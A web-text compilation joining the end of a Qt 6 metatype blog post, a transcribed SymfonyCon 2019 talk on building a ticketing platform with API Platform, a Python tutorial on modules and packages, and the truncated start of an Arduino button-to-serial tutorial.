Speaking of the next decade, you might wonder what the future holds in store for the metatype system. Besides our already mentioned plans to use it to enhance the QML engine, we also intend to improve the signal/slot connection logic. Both of those changes should not affect your code in any way, but simply improve performance and memory usage in a few places. In the farther future, we will also certainly monitor how C++ evolves, especially when it comes to static reflection and meta-classes. While we do not expect moc to go away anytime soon, we do consider replacing some of its functionality with C++ features once they become widely available.

Oh, and by the way, we have added one more piece of new functionality in Qt 6.0: QMetaContainer. What's that, you ask? Well, watch this space for another blog post coming soon and you'll know.

[1] In 5.15 and 6.0, the QML engine copies the information from the property metatypes into a custom data structure called the PropertyCache. By having the property metatype available, we can already speed this up a bit, as we do not have to look up the metatypes by name. In the upcoming releases, we want to remove the PropertyCache completely and instead reuse the metatypes from the metaobject.
[2] Doing this might also improve your build times as a welcome side effect.
[3] Though that depends on a pending change to make QPaintDevice a bit smaller.
SymfonyCon 2019 Amsterdam presentation by Antonio Peric-Mazar. Hello? can you hear me? Yeah. Cool. Hi. Morning. How are you enjoying the conference? Yeah. Cool. Uh, first I want to thank you, the entire Symfony team for inviting me to speak here. Uh, I did many conferences. This one was on my bucket list for a while, so I'm really, really happy to be here. Also, thanks to the sponsors for making this happen. Uh, before I start, I want to get to know more about you. So first, who is using Symfony 5 in production? There is a guy, okay. Who is using API platform. Okay. Like 30% of the people. Cool. Uh, so my name is Antonio Perić-Mažar. I'm from Croatia, from Split. I'm the CEO of Locastic. I'm also co-founder of the Litto, it is not software development agency. It is different industry. And we also, two years ago, co-founded the Tinel Meetup, which is in our industry. And every month we bring one foreign speaker to our home city to do of course free meetup, with beers, pizza and hanging around. Uh, we are very proud about that. Just few words about company. We are doing bunch of Symfony backend based projects. We are also doing a lot of user experience projects working with the banks, telecom operators. We are not like big company, only 20 people, but we are like really do, I would say, good things. Uh, what is our, what is the context of my talk, API platform experience? So one of the biggest projects that we did, which is based on Symfony and API platform, is ticketing platform for GFNY organization. That is the franchise business that is running in 26 countries and supporting our users from 82 countries in eight different languages including Hebrew and Indonesian.
We are having that in production for a year and a half serving approximately 60,000 tickets per year. The complexity of this project is not like high traffic or like high availability. It's more like in domain that the main is really, really complex on the front end it's React with Redux on the backend is fully Symfony with API platform. With API platform. We also did some social networks chat based, and some matching similar to the Tinder. I assume that some of you know what's the Tinder and also with a few like enterprise CRM, ERP applications so that that is something that I want to share some parts of our experience in this talk. When I planned the talk I was like aiming to talk only about this ticketing system but actually when I start writing on a paper I noticed there is like bunch of things that are repeating so I pulled a few of them and I will try to show you as best as I can what what we are doing and how we are doing the things. What is the API platform because only like 40% people is using the API platform. I will just do quick introduction to the API platform, so if we want to trust Fabien Potencier air, that's the, that's the most powerful API platform in any language in the world. It is based on Symfony. It is dedicated to API dream projects. It contains PHP library to create fully PHP features, APIs, supporting industry standards, providing some Javascript libraries shipped with Docker and Kubernetes integration and it's now Symfony official API stack. It's very, it's very powerful tool containing many feature like simple creating crud, data validation, pagination, filtering, sorting, hypermedia, GraphQL support, whatever. Basically whatever you need to build modern APIs in matter of minutes. So just for example, I want to show you how simple it is to create crud in literally for the seconds. So basically the first thing that we need to do is create some model, some entity, regular entity in a Symfony. 
So it has a name, it has ID, nothing, nothing special. The second thing is that we need to map that to the our ORM system and we need, if we want to have some validation and the only thing that we need to expose this as a resource, as the API resources to do one line of configuration. I'm using yaml. You can use XML you can use annotations, you can use whatever you want, but this is the only thing that you need to do. And you are getting fully operational crud for API, fully operational API resource with beautiful documentation. You can play it, you can test it here it, it works perfectly. So what we are getting, we are getting two types of operation that's collection operations and that's item operations to our mandatory GET on a collection and GET on the item. Others can be removed or modified or whatever. Now this is the as as we don't have controllers, we don't have anything here. We just have configuration for the API resources. We have bunch of extension points that we can use to build our business logic. So the best thing about API platform is that it's not focusing you to think about framework itself, it's you, it's you are focusing even more than with Symfony 4 on building your value, business value for your users. Okay, so at the top of the end is the kernel events. That is regular Symfony events. But suggestion is to use other extension points because kernel events works only with the rest APIs and other extension points will work even if you are using GraphQL as your, as your APIs, uh, it is using action domain responder pattern which is like better alternative for HTTP comparing to MVC how it works, so user GET like sends something to the URI which is requesting some action. Action asks domain to do some logic and then responder or gives respond to the end user. If you divide that in the API platform, we have separation like this on the left side in the action part we have operational resources and actions that we did with configuration. 
Then we have data providers, data persister and other things which contains some kind of hard domain logic and then we have serialization response which is actually responder with the things that I show you as the extension point. You can basically do the changes in any of these free parts. We have also serialization group divides in two contexts. One is normalized context. Second one is deserialized context. Why this is very powerful. It's because in this way with very simple configuration, we can have different read write models without even writing the custom code for that so we can normalize a context. You can specify which fields are you requiring. For example, for creating or updating the resource and with deserialize you can say what you want to expose to the user. Okay, so how, how the regular project looks like with the, with the API platform and a Symfony. The things that I will talk today, it's more like about big Symfony projects which are using the API platform as one part of the application. The one part that is actually communicating with any part, with any client's application. It can be your watch, it can be your fridge, it can be your single page application, it can be your computer, it can be your car, whatever you want. We are exposing API to the API platform. We are getting some amazing thing to implement our logic. So today you will see that and our projects, we are quite, I know that we are at the conferences talking about a lot about decoupling from the framework, but I think that some points we are missing to talk how to leverage the framework. Like for example, in our case, the fully decoupling from the Symfony is not something that you are doing because in the future we will never move from the Symfony even more maybe from the PHP but not from the Symfony. So leveraging the framework, it's a huge advantage for us, especially if we have nice structure of the projects and how we can do that. 
So first advice that I have for you is for configuration. Use the yaml if you have a longterm project. Did this configuration can be quite extensive and I know that annotations are really easy. Nice to start. But imagine this having inner annotations, this is what I selected. It's the configuration for only one resource. This can be even improved this file, because we can separate this in few files, which will be yaml files of course. But imagine this having in one huge annotation with bunch of other things. It can be really, really messy. I personally use annotation for a demo because they will save me a bunch of time, but if we are doing like longterm projects, we prefer yaml. You can use whatever you want. This is just my advice. Okay. First thing that every application has is users. So let's see. Few tips and tricks, how you can do user management or security. If you have listened to the security talk yesterday, probably some of the things will be familiar to you, but there are few touchpoints that I want you to have intention to that. So basically if you are using API platform, you don't want to use FOSUserBundle. I assume that you are all aware of FOSUserBundle but FOSUserBundle. It's not built for REST. It's built for some quick user management and it brings a lot of over head with itself. As your project grows, you will have more and more problem overriding the things that are built in FOSUserBundle. For example, I'm working at the moment at one legacy project and I spent the days removing some parts of the FOSUserBundle, finally I'm clean so I can, I can change it. What you can use, it's actually Doctrine User Provider which is included in Symfony 4 so it's simple and easy to integrate. Then you need to, only thing that you need to do is bin/console maker:user. You will get fully working user with everything setup in security and the only thing in rest API that you need to implement some action. For example, registration action. So this is how it looks. 
It needs to implement UserInterface and I set up already some some groups, some from writes some from read, so normalization and the denormalization context. Second thing is that I need to map that to my ORM and database and then I need configure the resources, as you can see here, this is a little bigger configuration because I set up the normalization context and denormalization context. Okay, so the next thing is what I want to do, I want to hash password. When I'm saving, when I'm storing user to the database, I want to implement registration. The only thing that I need to do is create UserDataPersister. In the UserDataPersister I have the method which is the second method which is actually the first after, after the construct which returns do I support this method for this entity? If it is true it will do persist or remove. Depends what we need to do and in the persist method what I'm doing, I'm hashing the plain password, removing the plain password, saving User to the database. I can send the email here, I can do whatever logic I want so like I am putting some custom logic in a place in the API platform. What we are using mostly for for for security for a login is JSON web tokens can, which are like standards that are lightweight and simply identification system stateless and they are storing, token to the browser, local storage and then can be authenticated. This depends on the, from the project from the project. For some projects you will need or too or something else. But this works for, for for example, for this ticketing system, this works perfectly. It works very simple. You send request to the server with your user name and password. Server signs the token returns this to you and which every new request you are sending that to the server. What is very important thing that I want you to pay notice here is that insight. When we are decrypting this encoded string, we are actually getting the data about user. We can get any data that we want to start by. 
For example, we will store the email; I'll tell you in a moment why this is so important. For this authentication we have two bundles, LexikJWTAuthenticationBundle and JWTRefreshTokenBundle. JWTRefreshTokenBundle is used after your token has expired, to get a new one. So basically, after the login you will get a token and a refresh token; the token will be signed and will have a short time to live. Also, one very nice thing that a lot of developers miss in the documentation is the user checker in the Security component, and this can save a lot of time for you. Basically, Symfony uses a default UserChecker, but you can implement your own just by implementing this interface, and then the only thing you need is one line of setup in security.yaml. This way you can do additional checks using any fields that you want on a user: is it expired, is it blocked, is it deleted, is it banned, or whatever you want. It gives you very good flexibility, and two extension points: pre-authorization and post-authorization. Resource- and operation-level security in API Platform is quite powerful to set up. Basically, this configuration says that if you want access to the Book resource, you need at least the user role: you need to be logged in. If you want to create a new book, you need the admin role. If you want to update a book, you need to be the owner of that book and you need to be an admin. Okay. And what's even more powerful is using voters. You all know what voters are? Okay, cool. So the same way that you use voters in any Symfony project, with the two lines of configuration on this slide you can use them in an API Platform project. When I told you to pay attention to the JWT token, it was about this: usually your user is stored in your database.
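In YAML, the operation-level security rules described above might look something like this (the resource, field, and role names are illustrative, and the exact keys vary between API Platform versions):

```yaml
# config/api_platform/resources.yaml (sketch)
App\Entity\Book:
  collectionOperations:
    get:
      security: 'is_granted("ROLE_USER")'
    post:
      security: 'is_granted("ROLE_ADMIN")'
  itemOperations:
    get:
      security: 'is_granted("ROLE_USER")'
    put:
      security: 'is_granted("ROLE_ADMIN") and object.owner == user'
```

For anything more complex than these expressions, the same `is_granted()` call can delegate to a regular Symfony voter.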
You have the DoctrineUserProvider, but in some projects it can happen that your user is stored in some third-party API, and communication with that third-party API is either not always possible or too slow, for example three seconds. You don't want users to wait three seconds every time. So what's the nice thing to do? It's actually to create a databaseless user. Since we have the email inside the JWT token, we don't need to load the user from the database every time to authorize them. We can authorize them from the email alone, because we can trust the JWT token, and this is a very nice technique to keep in mind. It's again just a line of configuration: we need to set up the default lexik_jwt user provider, and we need to tell our API firewall to use that provider. All done. The only thing that you need to keep in mind is that if you want full user information, you need to load it manually; you cannot just do a token-based getUser(). Okay: creating a multi-language API. If you are doing big projects, these days you will usually need to create multi-language APIs. API Platform does not support that out of the box, so when we got this requirement we had to find a solution for it. What we actually did, as we do a lot with Sylius (whose people are also doing amazing work, same as the API Platform people), was take the idea of how Sylius translations work and implement that with API Platform. We created an open-source bundle, published it to GitHub, and there is also a blog post explaining how you can use it. It's actually quite easy: after you install the bundle, you need to extend the entity that you want to be translatable with AbstractTranslatable and add the first method, createTranslation. That method loads the translation entity that we will implement later.
And the second thing is that we need to implement a translation relation to our PostTranslation entity. Of course, we need to create some virtual fields which will be used for single-language queries, and then we need to implement the translation entity, which will contain all the fields that we want to translate. After we have done all of this, we need to set up a few lines of configuration: the translation groups for the normalization context, and the translation groups for any filters or whatever we want to use. And how do we use this? It's quite easy. When we create a new resource, we send all the languages that we want to create, so in this example we are creating English and German, and we send all the fields; you can see that we have the locale code inside. If we want to get a single language, we can query only that language; then we use these virtual properties and get only the title and the content for the English language. If we want all the languages, we need to dynamically send the groups (translation), and we will get all the languages listed. The second thing that you need to figure out when you have a multi-language API is static translations. There are two solutions. One solution is to use LexikTranslationBundle, which stores translations in the database but lets you export them to files. We wanted a solution that writes directly to the files, so that we don't need cron jobs or manual dumping of the translations to the files. There is a guide on our blog for this too; it's too much code to show here, but it's a really easy concept. So if you want to learn how to write your own translation handling, you can go there and check it. The next thing I want to talk about is manipulating the context. The example I have on the slide is taken straight from the API Platform documentation, but this is a very important feature of API Platform. Why is it important?
It is important because, as one of the basic examples, we don't need to have two separate APIs for admins and for regular users. We can have the same access points, but based on roles we can return different responses. How does this work? Again, we have an API resource (you can see the annotation configuration here), and then we add serializer groups. You can see that on the "active" field we have book:output and admin:input, and on the "name" field we have book:output and book:input. So what we do is create a service, our BookContextBuilder, decorate API Platform's api_platform.serializer.context_builder, and build our custom logic inside. It's a very simple concept: we just check what we are dealing with. Is this the Book resource? Are we doing denormalization or normalization? Is the user logged in, and do they have the admin role? If so, we check the context groups and add the group admin:input. Period, that's it. You will get a different response for a regular user and for an admin user. Now, the Symfony Messenger component: who is using the Symfony Messenger component? Okay, not that many people, but still a lot, maybe 20%. The Symfony Messenger component is very simple to start using. It gives us communication through queues between different applications; it's easy to implement, easy to use, and makes asynchronous communication easy. It works in a very simple way: you have a sender and a handler. The sender sends a message, the handler takes that message and does some logic, and we have a bus with transports in between. We can also have middleware, but you can read about that in the documentation. Why am I talking about this? Because with Symfony Messenger and API Platform we can have Command Query Responsibility Segregation, the CQRS pattern. It's very easy: basically you just need to set up configuration.
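As a sketch, that CQRS configuration on the API Platform side could look like this (attribute names follow the API Platform 2.x style; treat the resource and details as illustrative):

```yaml
# config/api_platform/resources.yaml (sketch)
App\Entity\Book:
  collectionOperations:
    post:
      messenger: true   # dispatch the resource through Symfony Messenger
      output: false     # return no serialized resource in the response body
      status: 202       # "Accepted": a handler will process it asynchronously
```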
Again, you say on the resource that we are using Messenger, that the output is false, for example, and that the response for this action will be a 202 status. Then the handler will do the heavy work. That is the simple use; I want to talk about a more advanced one. You can also use this in an ImageMediaDataPersister, for example, in data persisters: if you have an image that you want to resize, you can dispatch a message, and then some Lambda or cloud function can do the work and return the image. You can also use it in events, but as I said, try to use the other extension points first. Here is the reason why Messenger is so important for me. This is the project that I'm actually working on. It's fully hosted on Google Cloud Platform; it's an event-sourced, distributed architecture. In blue is the part that actually hosts our Symfony application; in yellow and orange are Cloud Functions from Google Cloud Platform, Firebase, and other services. We have a bunch of Pub/Sub services communicating in between, and API Platform is this small red dot here. Literally, API Platform exposes the REST API to the client apps, and everything behind it, as I stated at the beginning of my talk, is Symfony. So Symfony is always the more complex part, not just API Platform. Talking about Symfony and Messenger: if you read the documentation, it's always one application sending a message and that same application consuming the message. That works perfectly. But usually that's not how things work.
Usually you are communicating between at least two different Symfony applications, or, even more commonly, you are communicating with third-party applications: Node.js applications, Go applications, whatever. Symfony works perfectly in the first case; in the second case it works less well; and in the third case it doesn't work out of the box at all. Can I even say "out of the box"? It doesn't work with just the configuration that you set up in your Symfony application. Why? This is what a message dispatched by Symfony looks like. We have a body, which actually contains our message, and then a bunch of headers which describe which handler will be used, which command bus, and so on: a bunch of configuration that our Symfony application needs. If you dispatch this App\Message\CommunicationMessage to some other Symfony application, there is a huge chance that you are not using the same namespace, so this won't work. And if you are dispatching the message from a Node.js application, for example, which was my case, you don't have the properties and the headers at all. In Symfony's format the body is a string containing escaped JSON, while the properties and headers are proper JSON; from the other side you actually just get some plain JSON, with no description, nothing. So a colleague developer on the team and I started working on this: he was dispatching the message, and I was getting errors and errors. I started researching, and the simple solution was: "Can you add the headers and the other things that we need?" At first it was, "huh, no", but since that was the only message we were consuming from the other side at the moment: okay, let's do that. That's the quickest way, but it's not a sustainable way; we wanted to do it better. The way to do it better is to write your own custom ExternalJsonMessageSerializer.
What does that ExternalJsonMessageSerializer do? It receives your message, decodes it from a string to an array, and then, based on some parameter (if you have one in the message), it checks what it is receiving and creates the message object that your Symfony Messenger handler needs. Of course, you need to have some parameter that you can catch at this point. We were lucky enough to have such a key: based on the key I know whether it's testing or communication or caching or whatever, and I have the variables which I know form the body of my message. Again, you create your message and return it, and that will work. You also need to set up some configuration, because by default Symfony Messenger uses the default Symfony Messenger serializer. A second possible solution is to use the Happyr message serializer. I didn't put the code for that serializer on the slide because it has a dependency: you need to have a body property in the JSON, and with a custom serializer we can even work around that. There is also a blog post, "Symfony Messenger on AWS Lambda", that I think Tobias wrote. Also keep in mind that the Messenger component is similar to ORM components: it will work in most cases, but if you have some really specific cases, you will need to build something yourself at some point, or at least do some really heavy customization. Handling emails with the new Symfony Mailer component is easier than ever. We send a bunch of emails and a bunch of notifications in all the applications mentioned at the beginning. So how do you do it? Read up on the Symfony Mailer component. It has really easy integration with Symfony Messenger, which means you can send emails asynchronously. It also has support for load balancing.
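For illustration, that load balancing can be expressed directly in the mailer DSN (the providers and credentials below are placeholders):

```yaml
# config/packages/mailer.yaml (sketch)
framework:
  mailer:
    dsn: 'roundrobin(ses+smtp://KEY:SECRET@default postmark+api://TOKEN@default)'
    # use failover(...) instead if you want high availability rather than load balancing
```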
So if you have three or four different transports for emails, it will spread them with the round-robin method. There is also high availability: if a transport fails, it will fail over to the second and then the third transport. Out of the box it supports Amazon SES, Gmail, Mailchimp, Mandrill, Mailgun, Postmark, and SendGrid, and for me personally that is the best thing that happened with this component, because setting up emails used to be really painful. So if you are not using it, check it out; it's much better than the SwiftMailer we had a few years ago, or even a few months ago. Creating reports and exports: when you are doing ticketing systems, that is something you do on a daily basis. The problem we had was importing data from a few different sources, storing it in a database, doing some transformations, and exporting it in a totally different format to our users. So how did we do the importing? First we set up crawlers with the Symfony Messenger component and crawled all the data that we needed. We could not do the transformation on the fly, because there were too many relationships between all the data we were getting, so we had to store it in the database, then do the transformation, then store it in the database again to get it into the format that we wanted to use. Now that we had the data in a format we could store, read, and operate on, we needed to export it to CSV files; it's the same if you are doing XML files. What you need to do is create a custom operation for the export. You need to change the format to CSV, for example; in this case you need to say what the DTO (Data Transfer Object) for your output is, in this case the OrderExport class; which group we will use, in this case OrderExport; and that this is a POST method.
I got the question: why is it POST, not GET? POST, because when we are creating something we always use POST, and in this situation we are creating a document that does not exist yet. That's our logic; again, you can use GET if you want. Next, you need to create this DTO object. It's a simple model, the same as the model you have for reading from and writing to your database via an entity. This DTO contains a bunch of properties with get and set methods (you can also go with public properties, that depends on you). The second thing is that you need to implement a DataTransformer. A DataTransformer, again, is a simple class that does only one thing: transform data from one format to another. Actually, "format" is the wrong word: literally from one object to another object, making some changes along the way to how we store the data. So what we have here: we have the export on the left side, which is created at the beginning of the transform method, and we set the values, transforming where needed, for export to the end user. What is very important here, in case you didn't notice, is pagination_enabled: false. Why? Because in the report we want all the data that we have in the database; by default we would get 30 records, and that's it. That's how you do exports and reports in any format that you want: you just need to create objects that will contain the data and export them to the users. Real-time applications with API Platform: who is using, or who has heard about, Mercure? Okay, cool. This is what we can now do easily. And what are real-time applications? If you do an update on the web, it will be updated on all mobile devices that are connected. In the past there were ways to build real-time applications, but usually those were, let's call them, weird solutions.
It would be some Node.js combination: clients would be subscribed to Node, PHP would publish to Redis, Node would read it and then send it over WebSockets to all the connected clients. There was Pusher, a hosted solution; ReactPHP did something too, and I think they actually did a good job there. But to be honest, PHP is not built for real-time applications; PHP is built for request/response, we all know that. What actually changed here is that we have this Mercure hub, created by Kévin. Kévin has done a lot of amazing work with Symfony and with Mercure, as you heard if you listened yesterday. Basically, after we create something, we pass that resource to the Mercure hub, and then the Mercure hub sends server-sent events to all clients that are connected to it. It cannot go in the opposite direction, so it's not duplex communication like WebSockets, but in 99% of cases this will be a solution that works for your project. If you are doing a chat application or push notifications, it will work. Now, this is just a short description: it's written in Go, it does automatic HTTP/2 and HTTPS, it has CORS support, it's cloud native, it's open source, and a bunch of other things. And this is very interesting: it works very easily out of the box with API Platform. Basically, you only need to set mercure: true, and any change that you make to your resource will automatically be sent to the Mercure hub, and if some users are connected, they will get the data. This bit of JavaScript is the few lines of code that you need to subscribe to Mercure and get the data once an event happens. If you are doing big applications like this, you need to write tests. What we learned while building these applications is, for example, that we don't believe in 100% test coverage, because that usually means we would lose a lot of time.
But we believe in smart testing: we want to test the critical cases, we want to test any bug that has happened, and we want to have really well-structured tests. For legacy code we also have a policy: if we get a bug or something, we will first cover it with a test and then resolve it. And if you are not very experienced, TDD will maybe be hard at the beginning for you, so just start writing tests. But I want to talk a little bit about API testing tools. The first tool, which you get out of the box with API Platform, is API Platform's HTTP client, which manipulates the Symfony HttpKernel directly. That gives a boost in performance, and you will have much faster tests compared with tests over the network. It's also good to consider another tool, ApiTestCase from the Sylius project; they are quite similar, I would say. With ApiTestCase you get a lot of helper methods that can save you a bunch of time: does the JSON equal something, does the JSON contain something, does this match the schema that we defined for the resource, for example a Book object. A second very useful thing is PHP-Matcher, because when you are creating dummy data you don't want to assert literal values like name "Antonio", surname "Peric", "SymfonyCon". You just want to check: is this a string type, is this an integer type, is this a date, does this array contain something? That is possible with PHP-Matcher, and it will save you a bunch of time. There are plenty of methods inside, so you can check basically any type of expression that you have in your response. If you are setting up a new project and need dummy data, Faker, which works with AliceBundle under the hood, is a very useful tool to create dummy data that looks like real data. Kévin used it yesterday for his demo at the end of the talk; the data was created with AliceBundle. You can also use Postman tests.
Postman tests are very nice, but they will be slower than ApiTestCase, both the Sylius one and API Platform's. On the other hand, Postman can later be used as an interactive specification of your API for your front-end developers. The tests are written in JavaScript, but they are very simple to write, and you can then integrate them with Newman in your console or in your CI and run them before deploying to the server, to check that everything is okay with your API. There are also tools for checking test quality, like Infection and PHPStan, plus continuous integration and other things. I think you hear a lot about these tools, so I will just mention them: use them, they are good tools. Okay, the last slide before I'm done is actually the picture that Fabien Potencier tweeted a few days ago, from the book he's writing, about the architecture of a modern application built with Symfony. The applications that I mentioned today, whose parts I described, are actually built this way. We have a bunch of modules which are integrated to work together. Some modules communicate directly through APIs inside the code; some communicate through the Messenger component, depending on what they are doing. And the API is only one part, the part which exposes everything to the user, but it also gives us really nice extension points where we can put a bunch of our logic. Usually, of course, in this kind of application you also have a lot of console command applications doing a lot of background jobs, as workers or cron jobs or whatever. One last thing, as a conclusion: API Platform and Symfony, especially Symfony 4, are really awesome tools, and I think we should all be happy that we have such a good framework in PHP and that we use it as part of our everyday work. Thank you.
https://symfonycasts.com/screencast/symfonycon2019/using-api-platform-to-build-ticketing-system
Imagine you want to write an e-commerce application, where people can search for interesting stuff, place orders, keep informed about new articles and much more. You might write a file that contains all necessary functions, for example (pseudo code):

add_item_to_basket(customer_id, item_id)
remove_item_from_basket(customer_id, item_id)
place_order(customer_id)
get_items_from_basket(customer_id)
subscribe_to_newsletter(customer_id, newsletter_id)
unsubscribe_from_newsletter(customer_id, newsletter_id)
search_for_item(name_pattern)
change_user_name(customer_id, name)
change_password(customer_id, password)

Of course these are just a few high-level functions an application like this will need. You will end up with a few thousand more functions, with certainly tens to hundreds of thousands of lines of code in a single file. What's wrong with this? First of all, no one wants to edit a single file of that size. It is hard to keep an overview of where to find a certain function. The main drawback, though, is that all the different functionalities like basket, user management and so on are mixed up in one file! Wouldn't it be great if every component were independent and individually maintainable? Or maybe you want to share components between different parts of the application? Or use the work of others, save time and avoid error-prone development? Or even make your code available for others? This is where modularity steps in!

Learning goals

In this tutorial you will learn how to organize your code by modular programming. The basic concept of modular programming in Python is to place your classes and functions in modules and packages.

What's a module?

All programming tutorials start with the well-known "Hello, World" program, so let's create a file hello_world.py with the following content:

print("Hello World!")

and execute it with your Python interpreter:

python3 hello_world.py

hello_world.py is called a Python source file.
When your program gets larger and more complex, it might be helpful to print out some meaningful messages to track which part of the code is executed, but only during development or testing. You could write something like this:

def print_debug_message(message):
    if show_debug_messages:
        print("Debug: " + message)

show_debug_messages = True

print_debug_message("Begin of Hello World")
print("Hello World!")
print_debug_message("End of Hello World")

This works as expected. But the function print_debug_message and the variable show_debug_messages have nothing to do with our "Hello, World" program. They bloat up the code and do not fit the context. And maybe you want to use them elsewhere. Let's create a new file for our debug tools and name it debug_tools.py. Move print_debug_message and show_debug_messages to this file and add an init() function:

def init():
    global show_debug_messages
    show_debug_messages = False

def print_debug_message(message):
    if show_debug_messages:
        print("Debug: " + message)

Bravo, you just created your first module! And you can instantly use it in your hello_world.py code:

import debug_tools

debug_tools.init()
debug_tools.show_debug_messages = True

debug_tools.print_debug_message("Begin of Hello World")
print("Hello World!")
debug_tools.print_debug_message("End of Hello World")

Note: In this example we use the global statement, which hasn't been introduced yet. If used in a module, it defines a variable that is visible throughout the whole module, but only in the module.

A Python module is in fact a Python source file, and the name of the module is the filename without the .py suffix. You can use a module by loading it with the import statement. As you can see, you have to prepend debug_tools followed by a . to the functions of the module you want to use. We will talk about this in a later chapter, where we take a deeper look at the import statement.

Note: You might have heard that "Python has batteries included".
That means Python comes with a lot of built-in functionality, and in most cases there is no need to write a debug module from scratch. This one is just for learning purposes.

What's a package?

Larger software projects use many modules. Saving all these module files in the project root directory is not a best practice, as it is, again, hard to maintain and to track. You can group your module files by moving them into packages. A package is simply a directory containing a special file __init__.py that is called the package initialization file. Whenever Python discovers this file in a folder, this folder will be used as a package. The __init__.py file may be empty, but it may also contain initialization code for your module (that's why it is called the package initialization file).

How to import a package

To use a module inside a package you invoke the import statement:

import debug_tools.debug_to_console
debug_tools.debug_to_console.print_debug_message("My debug")

Here you use the print_debug_message function from the debug_to_console module that is part of the debug_tools package. The file system would look like this:

myMachine:~/pythonDemo> ls -R
debug_tools my_program.py

./debug_tools:
__init__.py debug_to_console.py

In fact, we imported a module from a package. Let's take a deep dive into the import statement.

The import statement

Simple import

There are several ways to import modules and packages. Until now we used the import statement as follows:

import my_fancy_module

to import a module, and

import my_cool_package.some_module

to import a module inside a package. You can also import multiple modules in one statement:

import my_module1, some_other_module, an_even_better_module

You may also import only certain functions from a module:

from my_math import pi

And then use it directly as follows:

print(pi)

Importing and renaming

Sometimes it may be useful to change the name of a module.
To change the name you can import like this:

import my_module_that_does_math as my_math

You can now use functions of that module as:

value = my_math.get_square_root(2)

Be careful! If you change the name of a module it may be hard to track where the module is used. Another use case for renaming a module is to avoid naming conflicts. For example, say you have two packages with a module named debug. You may import them as:

import frontend_package.debug as frontend_debug
import backend_package.debug as backend_debug

This applies also to the from ... import ... as ... statement.

Global vs. local imports

If you import a module or package at the top of your program (like we did), the module or package is loaded into the global namespace. That means you can use the imported code everywhere in your code file. This is generally best practice. Next to the global namespace there is the local namespace. Take a look at this example:

def my_local_function():
    import some_module
    some_module.just_do_it()

All the functions and variables of the imported module are only visible and usable from within the function my_local_function. We say the module is imported into the local namespace. Generally, you should avoid importing into a local namespace. However, there are some circumstances where importing locally is recommendable. For example, assume you have a huge package that is used rarely. Because importing it executes a lot of initialization code, this might take a while, so you only want to import it if it is really necessary.

To see what is exposed to your current namespace you can use the dir() function. Start your Python interpreter, execute dir() and you should see something like this:

>>> dir()
['__builtins__', '__doc__', '__name__', '__package__']

Now import the math package:

>>> import math
>>> dir()
['__builtins__', '__doc__', '__name__', '__package__', 'math']

math is added to your namespace. dir() also accepts an argument.
If the argument is a module object, the list contains the names of the module's attributes. Try it with the imported math module:

>>> dir(math)
['__doc__', '__name__', ..., 'pi', ..., 'sqrt', ...]

(the full output lists all of the math module's functions and constants)

Exercise

A fundamental data structure is a stack. It is a collection of data with two basic functions, push and pop. For a much more detailed description see Wikipedia. Another data structure is a FIFO; Wikipedia again gives you a detailed explanation. The basic FIFO functions are enqueue and dequeue. Here is the challenge: implement a package data_structures with two modules named stack and fifo. All functions take an array as an argument and push, pop, enqueue and dequeue elements to and from that array. Example:

data_structures.stack.push(my_array, 5)
my_value = data_structures.stack.pop(my_array)
data_structures.fifo.enqueue(my_array, "FSE")
my_value = data_structures.fifo.dequeue(my_array)

Write reusable code

Always design and implement your module or package in a way that makes it useful not only for a single or very special purpose. For example, is your stack module limited only to numbers? Or just strings? It should work with all kinds of objects and data types. Use a style convention, and do not mix up different styles in your modules. The most commonly used and recommended style guide for Python is PEP 8. Document your code, both for yourself and your users; it helps others to use your module easily. There are many ways to document Python code. For further information about documentation we recommend docstrings and Sphinx.
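One possible sketch for the stack/FIFO exercise above. In a real project push/pop would live in data_structures/stack.py and enqueue/dequeue in data_structures/fifo.py, next to an (empty) __init__.py; they are shown together here so the sketch is self-contained:

```python
# data_structures/stack.py -- LIFO operations on a plain list
def push(array, element):
    """Put an element on top of the stack."""
    array.append(element)

def pop(array):
    """Remove and return the top element of the stack."""
    return array.pop()

# data_structures/fifo.py -- FIFO operations on a plain list
def enqueue(array, element):
    """Append an element to the end of the queue."""
    array.append(element)

def dequeue(array):
    """Remove and return the oldest element of the queue."""
    return array.pop(0)
```

Both modules work with any object type, which keeps the code reusable as recommended above.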
https://fullstackembedded.com/tutorials/conquering-the-chaos-how-to-write-modular-code/
an arcade or flight sim joystick button board or an Arduino Leonardo for a few bucks from China (DX.com).

You will need:
Arduino Uno
Any sort of button or switch (or multiple switches, but start off simple)
10kΩ resistor(s) (one for each button)
Eclipse (the front end for Java programming – instructions later on for install)
Arduino Software (the front end for Arduino programming)
Breadboard
Jumper wires
Patience
Any video game that you may want physical switches for (racing/flight sim)

Step 1: Installing & Testing the Software

First off, you will need Eclipse (). For this tutorial, I will be using Eclipse Classic 4.2.2 – 64 Bit. If you're running into problems during the install, refer to either Google or the FAQ. Now that Eclipse is installed, you will also need the Arduino program (). I'll be using the stable 1.0.5 version. You can skip this step if you know how to upload sketches to the Arduino. Now that you have all the software installed, we're going to go ahead and set up Arduino first. In the Arduino software, click Tools and make sure the board and port number make sense according to Device Manager. To test the board, go File > Examples > Basic > Blink, then hit the arrow in the top left that says Upload. If all goes right, the SMD on pin 13 should be blinking. Refer to THIS if you're having difficulties.

Step 2: Wiring up a Basic Switch & Programming

In this step, you will be hooking up a basic switch to pin 5. Why pin 5? I have no idea, but here's the wiring diagram (made using Fritzing). There are two diagrams, one for (1) 2-pin switch and one for (4) 4-pin switches. Now that you have a switch hooked onto pin 5, we begin programming in Arduino.
The code I used is attached and below:

// *********************************************
// this constant won't change:
const int buttonPin = 5; // the pin that the pushbutton is attached to

// Variables will change:
int buttonState = 0;     // current state of the button
int lastButtonState = 0; // previous state of the button

void setup() {
  // Initialize the button pin as an input:
  pinMode(buttonPin, INPUT);
  // Initialize serial communication:
  Serial.begin(9600);
}

void loop() {
  // Read the pushbutton input pin:
  buttonState = digitalRead(buttonPin);
  if (buttonState == HIGH) {
    // If the current state is HIGH, the button is pressed.
    // Send to serial that the engine has started:
    Serial.println("Start Engine");
    delay(100);
  }
  // Save the current state as the last state,
  // for next time through the loop
  lastButtonState = buttonState;
}
// *********************************************

When uploaded to the Arduino, you can open up the serial monitor (Tools > Serial Monitor) and press the button. It should display "Start Engine" as long as you're pressing the button. You may fiddle with the delay later on to suit your liking, but please note this may cause issues in-game. You are now sending a serial string through tactile feedback. This is great!

Step 3: Setting up Eclipse and Installing Libraries

